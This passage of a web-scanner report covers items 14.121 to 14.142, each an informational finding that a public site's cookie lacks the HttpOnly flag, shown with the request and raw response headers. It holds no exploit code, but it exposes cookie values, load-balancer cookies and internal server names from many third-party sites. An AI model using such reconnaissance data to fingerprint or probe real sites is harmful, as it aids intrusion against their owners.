Severity:   Information
Confidence:   Certain
Host:   http://www.imageshack.us
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

is_uuid

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.imageshack.us
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Sat, 02 Apr 2011 13:31:41 GMT
Content-Type: image/x-icon
Content-Length: 1150
Last-Modified: Thu, 06 Aug 2009 00:27:03 GMT
Connection: close
Set-Cookie: is_uuid=8c73deec231e4ae196986744389ee358; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.imageshack.us; path=/
P3P: CP="NOI CUR ADM OUR NOR STA NID"
X-Server-Name-And-Port: _:14000
Accept-Ranges: bytes

...[SNIP]...

14.121. http://www.in.gov/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerwww.IN.gov-http

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.in.gov
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:24 GMT
Server: Apache
Last-Modified: Tue, 25 Sep 2007 19:01:38 GMT
ETag: "21f435-47e-43afa5ddf6880"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: image/x-icon
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1865746442.20480.0000; expires=Sat, 02-Apr-2011 13:40:24 GMT; path=/

...[SNIP]...

14.122. http://www.info.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Z

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.info.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: Z=YOYLQIS74.205.26.218CKMLM; path=/
Date: Sat, 02 Apr 2011 13:39:22 GMT
Server: Apache
Last-Modified: Tue, 05 Feb 2008 12:02:40 GMT
ETag: "6683a5-57e-44568046cd800"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: image/x-icon

...[SNIP]...

14.123. http://www.infoplease.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infoplease.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Apache

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.infoplease.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:23 GMT
Server: Apache
Set-Cookie: Apache=173.193.214.243.1301751443376719; path=/; expires=Sun, 01-Apr-12 13:37:23 GMT
Last-Modified: Fri, 17 Jun 2005 14:58:05 GMT
ETag: "37e-3f9be36957940"
Accept-Ranges: bytes
Content-Length: 894
Cache-Control: max-age=604800
Expires: Sat, 09 Apr 2011 13:37:23 GMT
Content-Type: image/vnd.microsoft.icon

...[SNIP]...

14.124. http://www.informationgetter.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.informationgetter.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PSGUID
BIGipServerWEBFX-1

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.informationgetter.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: http://media.informationgetter.com/informationgetter/i/favicon.ico
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=si4pwt45afstykf12odjwp45; path=/; HttpOnly
Set-Cookie: PSGUID=27712755-7ebc-4e74-957b-cf0c17dd0e01; expires=Mon, 02-May-2011 13:41:32 GMT; path=/
X-AspNet-Version: 2.0.50727
Server-Name: MIS-WEB90B
P3P: CP="CAO PSA OUR"
Date: Sat, 02 Apr 2011 13:41:32 GMT
Content-Length: 0
Set-Cookie: BIGipServerWEBFX-1=1224883210.20480.0000; path=/


14.125. http://www.intelius.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intelius.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerp-trans

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.intelius.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:27:01 GMT
Server: Apache
Expires: Sat, 16 Apr 2011 06:27:01 GMT
Cache-Control: public
ETag: 28fbc42d6a55f25a1649eeed180b5e2d8b187633
Content-Type: image/x-icon
Set-Cookie: BIGipServerp-trans=IHtTtfLA7ZbfhKOfy7qTV8MjXwILd3g0tyuRzwPtKOEzUoz7LRmvGxfD28GJ92uoAgMg2+iCqe8RGg==; expires=Sat, 02-Apr-2011 14:57:01 GMT; path=/
Content-Length: 1150

...[SNIP]...

14.126. http://www.investopedia.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.investopedia.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

IUTCO

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.investopedia.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Sat, 02 Apr 2011 14:14:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://join.investopedia.com/login/login.aspx?ReturnUrl=%2ffavicon.ico
Set-Cookie: IUTCO=bf86aaaa-c96b-4f33-87a0-070ce81ac2f2IUTCO; expires=Thu, 02-Apr-2111 14:14:24 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 187

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://join.investopedia.com/login/login.aspx?ReturnUrl=%2ffavicon.ico">here</a>.</h2>
</body></html>

14.127. http://www.iwon.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iwon.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ltm

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.iwon.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:47 GMT
Server: Apache
Last-Modified: Fri, 01 Apr 2011 21:52:39 GMT
ETag: "588db-57e-49fe26db757c0"
Accept-Ranges: bytes
Content-Length: 1406
P3P: policyref="http://c4.iwon.com/w3c/p3p.xml", CP="CURa ADMa DEVa PSA PSD OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Connection: close
Content-Type: image/x-icon
Set-Cookie: ltm=2080594442.20480.0000; expires=Sat, 16-Apr-2011 13:31:46 GMT; path=/

...[SNIP]...

14.128. http://www.joann.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.joann.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACE_COOKIE=R3374572646
ACE_COOKIE=R1260911085

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.joann.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R3374572646; path=/; expires=Sun, 03-Apr-2011 13:43:27 GMT
Date: Sat, 02 Apr 2011 13:42:35 GMT
Set-Cookie: ACE_COOKIE=R1260911085; path=/; expires=Sun, 03-Apr-2011 13:43:27 GMT
Server: Apache
Last-Modified: Fri, 23 Oct 2009 14:46:01 GMT
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 894

...[SNIP]...

14.129. http://www.jstor.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jstor.org
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TENACIOUS

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jstor.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: TENACIOUS=R2998840958; path=/
Server: AtyponWS/7.2
ETag: "7KI7zr14ieD"
Last-Modified: Fri, 25 Jun 2010 18:23:24 GMT
Content-Length: 1150
Date: Sat, 02 Apr 2011 14:05:26 GMT

...[SNIP]...

14.130. http://www.kaspersky.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kaspersky.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kaspersky.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:56:15 GMT
Content-Type: image/x-icon
Content-Length: 7078
Last-Modified: Wed, 20 Oct 2010 16:54:38 GMT
Connection: keep-alive
Vary: Accept-Encoding
Expires: Mon, 02 May 2011 13:56:15 GMT
Cache-Control: max-age=2592000
Set-Cookie: uid=AAAAA02XKv+v+6cfDs/QAg==; path=/
Accept-Ranges: bytes

...... ..........F...........(.......00..........V... ..............(... ...@.........................................................................................................................
...[SNIP]...

14.131. http://www.kbb.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kbb.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kbb.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: max-age=864000
Content-Type: image/x-icon
Last-Modified: Mon, 12 May 2008 22:17:38 GMT
Accept-Ranges: bytes
ETag: "0ad7cfc7db4c81:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:25:22 GMT
Content-Length: 1150
Set-Cookie: BIGipServerpool_kbb.com=1964053514.20480.0000; path=/

............ .h.......(....... ..... ....................................................    .......................................................&z...X...]...]...V...q......2...O...+..................
...[SNIP]...

14.132. http://www.kcom.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kcom.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.kcom.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:56:57 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=986389017; expires=Sun, 01-Apr-2012 13:56:57 GMT; path=/
Set-Cookie: exp_last_activity=1301749017; expires=Sun, 01-Apr-2012 13:56:57 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 13:56:57 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16603

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

14.133. http://www.kcom.com/contact-us/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kcom.com
Path:   /contact-us/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /contact-us/ HTTP/1.1
Host: www.kcom.com
Proxy-Connection: keep-alive
Referer: http://www.kcom.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=986389016; __utmz=90957184.1301752662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); exp_last_activity=1301749027; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utma=90957184.848604376.1301752662.1301752662.1301752662.1; __utmc=90957184; __utmb=90957184.3.9.1301752673281

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1301749030; expires=Sun, 01-Apr-2012 13:57:10 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 13:57:11 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<META HTTP-EQUIV="Content-t
...[SNIP]...

14.134. http://www.kcom.com/contact-us/brighton

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kcom.com
Path:   /contact-us/brighton

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /contact-us/brighton HTTP/1.1
Host: www.kcom.com
Proxy-Connection: keep-alive
Referer: http://www.kcom.com/contact-us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=986389016; __utmz=90957184.1301752662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); exp_last_activity=1301749029; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=90957184.848604376.1301752662.1301752662.1301752662.1; __utmc=90957184; __utmb=90957184.4.9.1301752673281

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:20 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1301749040; expires=Sun, 01-Apr-2012 13:57:20 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fcontact-us%2Fbrighton%2F%22%3Bi%3A1%3Bs%3A12%3A%22%2Fcontact-us%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 13:57:21 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<META HTTP-EQUIV="Content-t
...[SNIP]...

14.135. http://www.kcom.com/large-enterprise/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kcom.com
Path:   /large-enterprise/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /large-enterprise/ HTTP/1.1
Host: www.kcom.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=986389016; exp_last_activity=1301749016; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utmz=90957184.1301752662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=90957184.848604376.1301752662.1301752662.1301752662.1; __utmc=90957184; __utmb=90957184.1.10.1301752662

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:08 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1301749028; expires=Sun, 01-Apr-2012 13:57:08 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 13:57:09 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20873

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

14.136. http://www.know-where.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.know-where.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.know-where.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:48 GMT
Server: Apache
Set-Cookie: Apache=173.193.214.243.1301751948535439; path=/; domain=.Know-Where.com
Last-Modified: Mon, 26 Jan 2009 06:20:00 GMT
ETag: "16668e-e36-4615cba75a400"
Accept-Ranges: bytes
Content-Length: 3638
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 13:45:48 GMT
Content-Type: image/x-icon

..............h...&... ..............(....... ...........@...........................EK...u:...................v.hh...!.........../...b....Q.OO......27..y{..fk.......................................
...[SNIP]...

14.137. http://www.kosmix.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kosmix.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kosmix.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:44 GMT
Server: Apache/2.2.15 (Fedora)
Last-Modified: Wed, 15 Sep 2010 16:51:21 GMT
Accept-Ranges: bytes
Content-Length: 0
Cache-Control: max-age=14400
Expires: Sat, 02 Apr 2011 17:35:44 GMT
Content-Type: image/vnd.microsoft.icon
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b545525d5f4f58455e445a4a423990;expires=Sat, 02-Apr-2011 13:37:44 GMT;path=/


14.138. http://www.life123.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.life123.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.life123.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:52:46 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Set-Cookie: cu.wz=0; Domain=.life123.com; Expires=Sun, 01-Apr-2012 13:52:47 GMT; Path=/
Set-Cookie: wz_cu=0; Domain=.life123.com; Expires=Sun, 01-Apr-2012 13:52:47 GMT; Path=/
Set-Cookie: accepting=1; Domain=.life123.com; Expires=Sun, 01-Apr-2012 13:52:47 GMT; Path=/
Set-Cookie: user=l=dir; Domain=.life123.com; Path=/
Content-Length: 58228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Articles and Answers ab
...[SNIP]...

14.139. http://www.lingospot.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lingospot.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lingospot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: LUI=979b847691af299f; Path=/; Expires=Fri, 31-Dec-2015 23:59:59 GMT; Domain=.lingospot.com
Set-Cookie: LUI=8ac36f99936b606b; Path=/; Expires=Fri, 31-Dec-2015 23:59:59 GMT; Domain=.lingospot.com
Content-Type: text/html
Content-Length: 345
Date: Sat, 02 Apr 2011 14:04:58 GMT
Server: lighttpd/1.4.15

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

14.140. http://www.livenation.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livenation.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.livenation.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
X-DC-Name: 1
Last-Modified: Mon, 14 Mar 2011 17:32:52 GMT
ETag: "57e-b383d900"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: image/x-icon
Date: Sat, 02 Apr 2011 13:56:47 GMT
Connection: close
Set-Cookie: SID=2BTJPLfIONxz_QyCzXXtqiPcEHNLR9ye6p4I6jUiwZP0HADsmUGTRk2wlHX9mvWx0bbWyqbw06GMzj61; path=/; domain=www.livenation.com
Set-Cookie: BID=u5Up0YnqlxOabrt1UX2Y30Lm4tnzIQ8R8NN6T75TtaVYG3UMRLDURHbGGwVIrufof5zZA7W3RpE9V4OWi-bW; path=/; domain=www.livenation.com; expires=Fri, 01-Jan-2038 00:00:01 GMT
Set-Cookie: CMPS=wrtjQhYpNssvW6tM4p2tH1hFnY28d+BZ; path=/

..............h.......(....... ...........@...........................UI..............v... ..g`..IB..........+&..kb..........@3..ZU..LH.."...!....... .......YX..CB..........7)......b`......sj..54..?=
...[SNIP]...

14.141. http://www.livescience.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livescience.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.livescience.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:47:50 GMT
Last-Modified: Thu, 27 Jan 2011 18:08:39 GMT
ETag: "cc75b4-0-49ad7d6c937c0"
Accept-Ranges: bytes
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: TS35f02b=25108f495f8f8964c4ca00124bb14c059bc9fadf8e313eda4d9729df; Path=/


14.142. http://www.marykay.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.marykay.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Length: 318
Content-Type: image/x-icon
Last-Modified: Thu, 10 Mar 2011 17:27:26 GMT
Accept-Ranges: bytes
ETag: "ef81c06c48dfcb1:b205e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=C7AF0F99472C520E98E3ADAFDE4C36B7; Path=/; Domain=.marykay.com
Set-Cookie: TLTSID=C7AF0F99472C520E98E3ADAFDE4C36B7; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS102
Date: Sat, 02 Apr 2011 14:18:35 GMT
Set-Cookie: www.marykay.com=537599148.20480.0000; expires=Sat, 09-Apr-2011 14:18:36 GMT; path=/

..............(.......(....... ....................................3...f...f...........................$...........\......m...wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwEwWtgEwFDu.rw4sWds%bwDDwtBtDwAGwt.
